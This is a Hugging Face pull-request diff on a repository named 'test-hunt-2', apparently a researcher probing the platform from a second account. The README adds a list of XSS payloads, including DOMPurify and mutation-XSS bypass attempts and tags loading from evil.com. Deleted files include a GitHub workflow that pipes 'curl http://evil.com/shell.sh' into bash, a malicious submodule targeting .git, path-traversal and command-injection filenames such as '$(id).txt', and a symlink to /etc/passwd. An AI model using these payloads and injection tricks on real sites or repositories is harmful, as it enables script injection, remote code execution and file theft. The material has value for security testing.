Hugging Face's logo

FIRSTACCOUNT69
/
test-hunt-2

Safetensors
test
Model card Files
xet
 Community
51

PR from Account 2

#5
by SECONDACCOUNT69 - opened
base: refs/heads/main
from: refs/pr/5
Discussion Files changed
+90
-72
This view is limited to 50 files because it contains too many changes. See the raw diff here.
Files changed (50) hide show
  1. .git/config +0 -1
  2. $(id).txt +0 -1
  3. %252e%252e%252fetc%252fpasswd +0 -1
  4. %2e%2e/%2e%2e/etc/passwd +0 -1
  5. .env +0 -1
  6. .git/tconfig +0 -1
  7. .git//vconfig +0 -1
  8. .git%00/config +0 -1
  9. .gitattributes +34 -0
  10. .github/workflows/evil.yml +0 -7
  11. .gitmodules +0 -3
  12. .git~1/config +0 -1
  13. AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt +0 -1
  14. README.md +54 -2
  15. __pycache__/exploit.py +0 -1
  16. `id`.txt +0 -1
  17. a.txt +0 -1
  18. a/b.txt +0 -1
  19. a/c.txt +0 -1
  20. aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt +0 -1
  21. bar.txt +0 -1
  22. c.txt +0 -1
  23. clean_redir.txt +0 -1
  24. con.txt +0 -1
  25. file/nname.txt +0 -1
  26. file%00name.txt +0 -1
  27. file%2500.txt +0 -1
  28. lfs-pointer-test.bin +0 -3
  29. lfs-test-proper.bin +0 -3
  30. link.txt +0 -1
  31. method_test.txt +0 -1
  32. method_test2.txt +0 -1
  33. node_modules/.cache/hack +0 -1
  34. normal.txt::$DATA +0 -1
  35. null-byte-test-cleanup.txt +0 -1
  36. nullbyte.txt +0 -1
  37. port_test.txt +0 -1
  38. pr-test.txt +0 -1
  39. public-test.txt +0 -1
  40. pwned.txt +1 -0
  41. redirect_chain_test.txt +0 -1
  42. redirect_test.txt +0 -1
  43. redirect_test2.txt +0 -1
  44. search-test.md +0 -7
  45. symlink-test +0 -1
  46. test.html +0 -1
  47. test.svg +1 -0
  48. test|id.txt +0 -1
  49. webhook-trigger.txt +0 -1
  50. webhook_test.txt +0 -2
.git/config DELETED
@@ -1 +0,0 @@
1
- test for leading space
 
 
$(id).txt DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
%252e%252e%252fetc%252fpasswd DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
%2e%2e/%2e%2e/etc/passwd DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
.env DELETED
@@ -1 +0,0 @@
1
- test content
 
 
.git/tconfig DELETED
@@ -1 +0,0 @@
1
- test for tab in git path
 
 
.git//vconfig DELETED
@@ -1 +0,0 @@
1
- test for vtab in git path
 
 
.git%00/config DELETED
@@ -1 +0,0 @@
1
- test for pct-null in git path
 
 
.gitattributes CHANGED
@@ -1 +1,35 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  *.safetensors filter=lfs diff=lfs merge=lfs -text
 
 
 
 
 
 
 
 
 
 
 
1
+ *.7z filter=lfs diff=lfs merge=lfs -text
2
+ *.arrow filter=lfs diff=lfs merge=lfs -text
3
+ *.bin filter=lfs diff=lfs merge=lfs -text
4
+ *.bz2 filter=lfs diff=lfs merge=lfs -text
5
+ *.ckpt filter=lfs diff=lfs merge=lfs -text
6
+ *.ftz filter=lfs diff=lfs merge=lfs -text
7
+ *.gz filter=lfs diff=lfs merge=lfs -text
8
+ *.h5 filter=lfs diff=lfs merge=lfs -text
9
+ *.joblib filter=lfs diff=lfs merge=lfs -text
10
+ *.lfs.* filter=lfs diff=lfs merge=lfs -text
11
+ *.mlmodel filter=lfs diff=lfs merge=lfs -text
12
+ *.model filter=lfs diff=lfs merge=lfs -text
13
+ *.msgpack filter=lfs diff=lfs merge=lfs -text
14
+ *.npy filter=lfs diff=lfs merge=lfs -text
15
+ *.npz filter=lfs diff=lfs merge=lfs -text
16
+ *.onnx filter=lfs diff=lfs merge=lfs -text
17
+ *.ot filter=lfs diff=lfs merge=lfs -text
18
+ *.parquet filter=lfs diff=lfs merge=lfs -text
19
+ *.pb filter=lfs diff=lfs merge=lfs -text
20
+ *.pickle filter=lfs diff=lfs merge=lfs -text
21
+ *.pkl filter=lfs diff=lfs merge=lfs -text
22
+ *.pt filter=lfs diff=lfs merge=lfs -text
23
+ *.pth filter=lfs diff=lfs merge=lfs -text
24
+ *.rar filter=lfs diff=lfs merge=lfs -text
25
  *.safetensors filter=lfs diff=lfs merge=lfs -text
26
+ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
27
+ *.tar.* filter=lfs diff=lfs merge=lfs -text
28
+ *.tar filter=lfs diff=lfs merge=lfs -text
29
+ *.tflite filter=lfs diff=lfs merge=lfs -text
30
+ *.tgz filter=lfs diff=lfs merge=lfs -text
31
+ *.wasm filter=lfs diff=lfs merge=lfs -text
32
+ *.xz filter=lfs diff=lfs merge=lfs -text
33
+ *.zip filter=lfs diff=lfs merge=lfs -text
34
+ *.zst filter=lfs diff=lfs merge=lfs -text
35
+ *tfevents* filter=lfs diff=lfs merge=lfs -text
.github/workflows/evil.yml DELETED
@@ -1,7 +0,0 @@
1
- inline:0:name: evil
2
- on: push
3
- jobs:
4
- evil:
5
- runs-on: ubuntu-latest
6
- steps:
7
- - run: curl http://evil.com/shell.sh | bash
 
 
 
 
 
 
 
 
.gitmodules DELETED
@@ -1,3 +0,0 @@
1
- [submodule "evil"]
2
- path = .git
3
- url = https://example.com/evil.git
 
 
 
 
.git~1/config DELETED
@@ -1 +0,0 @@
1
- shortname test
 
 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.txt DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
README.md CHANGED
@@ -1,5 +1,57 @@
1
  ---
2
  license: mit
3
  ---
4
- # test-hunt-2
5
- Test model for security research.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
  ---
2
  license: mit
3
  ---
4
+ # XSS Round 2
5
+
6
+ ## Test A: SVG animate
7
+ <svg><animate onbegin="alert(1)" attributeName="x" dur="1s">
8
+
9
+ ## Test B: SVG set
10
+ <svg><set attributeName="onmouseover" to="alert(1)">
11
+
12
+ ## Test C: SVG foreignObject
13
+ <svg><foreignObject><body onload="alert(1)"></body></foreignObject></svg>
14
+
15
+ ## Test D: SVG use external
16
+ <svg><use href="data:image/svg+xml,<svg onload=alert(1)>"></use></svg>
17
+
18
+ ## Test E: Style tag
19
+ <style>body{background:red}</style>
20
+
21
+ ## Test F: Base tag
22
+ <base href="https://evil.com/">
23
+
24
+ ## Test G: Object with SVG
25
+ <embed src="data:image/svg+xml,<svg onload=alert(1)>">
26
+
27
+ ## Test H: Anchor target
28
+ <a href="https://evil.com" target="_blank" rel="">Click me</a>
29
+
30
+ ## Test I: noscript
31
+ <noscript><img src=x onerror=alert(1)></noscript>
32
+
33
+ ## Test J: CSS import
34
+ <style>@import url("https://evil.com/steal.css")</style>
35
+
36
+ ## Test K: MathJax/KaTeX
37
+ $$\href{javascript:alert(1)}{click}$$
38
+
39
+ ## Test L: Tab/newline bypass
40
+ <img src=x on error="alert(1)">
41
+ <a hre f="javascript:alert(1)">test</a>
42
+
43
+ ## Test M: HTML comment bypass
44
+ <img src=x onerror="alert(1)"--!>
45
+
46
+ ## Test N: Mutation XSS
47
+ <svg><style><img src=x onerror=alert(1)>
48
+
49
+ ## Test O: DOMPurify bypass attempts
50
+ <math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
51
+ <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><style><path id="</style><img onerror=alert(1) src>">
52
+
53
+ ## Test P: noembed
54
+ <noembed><img src=x onerror=alert(1)></noembed>
55
+
56
+ ## Test Q: Title element
57
+ <svg><title><img src=x onerror=alert(1)></title></svg>
__pycache__/exploit.py DELETED
@@ -1 +0,0 @@
1
- test content
 
 
`id`.txt DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
a.txt DELETED
@@ -1 +0,0 @@
1
- test for 3x up from 3 deep = root level
 
 
a/b.txt DELETED
@@ -1 +0,0 @@
1
- test for many slashes
 
 
a/c.txt DELETED
@@ -1 +0,0 @@
1
- within_test
 
 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt DELETED
@@ -1 +0,0 @@
1
- test
 
 
bar.txt DELETED
@@ -1 +0,0 @@
1
- normalized_test
 
 
c.txt DELETED
@@ -1 +0,0 @@
1
- normalized_test2
 
 
clean_redir.txt DELETED
@@ -1 +0,0 @@
1
- test 1778466942
 
 
con.txt DELETED
@@ -1 +0,0 @@
1
- test
 
 
file/nname.txt DELETED
@@ -1 +0,0 @@
1
- test
 
 
file%00name.txt DELETED
@@ -1 +0,0 @@
1
- test
 
 
file%2500.txt DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
lfs-pointer-test.bin DELETED
@@ -1,3 +0,0 @@
1
- inline:0:version https://git-lfs.github.com/spec/v1
2
- oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
3
- size 12345
 
 
 
 
lfs-test-proper.bin DELETED
@@ -1,3 +0,0 @@
1
- inline:0:version https://git-lfs.github.com/spec/v1
2
- oid sha256:4d7a214614ab2935c943f9e0ff69d22eadbb8f32b1258daaa5e2ca24d17e2393
3
- size 12345
 
 
 
 
link.txt DELETED
@@ -1 +0,0 @@
1
- ../../../etc/passwd
 
 
method_test.txt DELETED
@@ -1 +0,0 @@
1
- test 1778466738
 
 
method_test2.txt DELETED
@@ -1 +0,0 @@
1
- test 1778467055
 
 
node_modules/.cache/hack DELETED
@@ -1 +0,0 @@
1
- test content
 
 
normal.txt::$DATA DELETED
@@ -1 +0,0 @@
1
- ads test
 
 
null-byte-test-cleanup.txt DELETED
@@ -1 +0,0 @@
1
- test content
 
 
nullbyte.txt DELETED
@@ -1 +0,0 @@
1
- null test
 
 
port_test.txt DELETED
@@ -1 +0,0 @@
1
- test 1778467241
 
 
pr-test.txt DELETED
@@ -1 +0,0 @@
1
- pr test content
 
 
public-test.txt DELETED
@@ -1 +0,0 @@
1
- Public trigger
 
 
pwned.txt ADDED
@@ -0,0 +1 @@
 
 
1
+ This PR was created by Account 2 without any permissions
redirect_chain_test.txt DELETED
@@ -1 +0,0 @@
1
- test 1778466487
 
 
redirect_test.txt DELETED
@@ -1 +0,0 @@
1
- redirect test 1778465976
 
 
redirect_test2.txt DELETED
@@ -1 +0,0 @@
1
- test 1778466302
 
 
search-test.md DELETED
@@ -1,7 +0,0 @@
1
- ---
2
- tags:
3
- - PUBLICSEARCHTOKEN99887766
4
- ---
5
- # Public Test Model
6
-
7
- This model contains PUBLICSEARCHTOKEN99887766 unique identifier for search testing.
 
 
 
 
 
 
 
 
symlink-test DELETED
@@ -1 +0,0 @@
1
- inline:0:/etc/passwd
 
 
test.html DELETED
@@ -1 +0,0 @@
1
- <html><head><title>Test</title></head><body><h1>XSS Test</h1><script>document.title="safe"</script></body></html>
 
 
test.svg ADDED
test|id.txt DELETED
@@ -1 +0,0 @@
1
- inline:0:test
 
 
webhook-trigger.txt DELETED
@@ -1 +0,0 @@
1
- trigger
 
 
webhook_test.txt DELETED
@@ -1,2 +0,0 @@
1
- webhook trigger Sun May 10 14:23:35 CEST 2026
2
- trigger Sun May 10 14:24:52 CEST 2026